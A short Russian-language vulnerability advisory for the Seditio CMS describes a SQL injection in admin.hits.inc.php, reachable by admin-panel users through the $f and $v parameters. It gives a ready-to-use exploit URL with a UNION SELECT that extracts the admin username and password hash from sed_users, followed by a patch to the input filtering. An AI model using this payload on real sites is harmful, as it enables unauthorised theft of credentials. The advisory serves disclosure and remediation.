Уязвимость найдена в admin.hits.inc.php, основана на недостаточной обработки переменных $v и $f
Данной дыркой могут воспользоваться только привиллигированные пользователи, имеющие доступ к панели администрирования. Уязвимость найдена во всех версиях Seditio (начиная 100 и заканчивая 170beta)
Пример эксплоита:
http://название_сайта/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed_users%20where%20user_id=1--%20or%271%27!=%271--
Метод устранения:
В admin.hits.inc.php найти:
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');
и заменить на
$f = sed_import('f','G','ALP',10);
$v = sed_import('v','G','TXT',8);
Forever unshaven, red-eyed, detached from reality, with his cockroaches in my head. And let it always will be!